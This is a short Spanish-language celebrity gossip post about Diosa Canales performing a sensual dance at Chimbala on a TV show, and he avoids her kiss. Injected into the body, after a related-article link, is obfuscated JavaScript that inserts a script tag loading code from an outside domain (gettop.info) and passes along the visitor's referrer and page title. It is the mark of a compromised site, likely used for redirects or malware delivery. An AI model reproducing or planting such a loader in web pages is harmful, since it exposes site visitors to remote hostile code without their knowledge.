Home / Publicaciones / Rincon Urbano / Diosa Canales Pone En Aprietos a Chimbala (Video+)

Diosa Canales Pone En Aprietos a Chimbala (Video+)

Chimbala paso un momento particular cuando la extrovertida y bien dotada Diosa Canales se puso a enamorarle< !more> con sus mejores atributos, esto ocurrió en el programa “Aquí Se Habla Español” cuando los pusieron a los dos a realizar una dinámica. Cuando Chimbala estaba siendo seducido en medio de un baile erótico, los presentadores del programa tuvieron que interrumpir a Diosa Canales por sus movimientos sensuales atrevidos.

Para que quede claro que con esta mujer no se juega, al final queria besarlo y Chimbala no se dejo.  Que opinan? se dejarían besar de esta mujer? Porque Chimbala le sale corriendo?

Mas noticias de Diosa Canales en el país clic aquí: Diosa Canales Dice Porque Le Gusta Quitarse La Ropavar d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

About Juan Pablo Martinez

Analista de sistemas y webmaster de hobby, siempre en la búsqueda del moro perdido...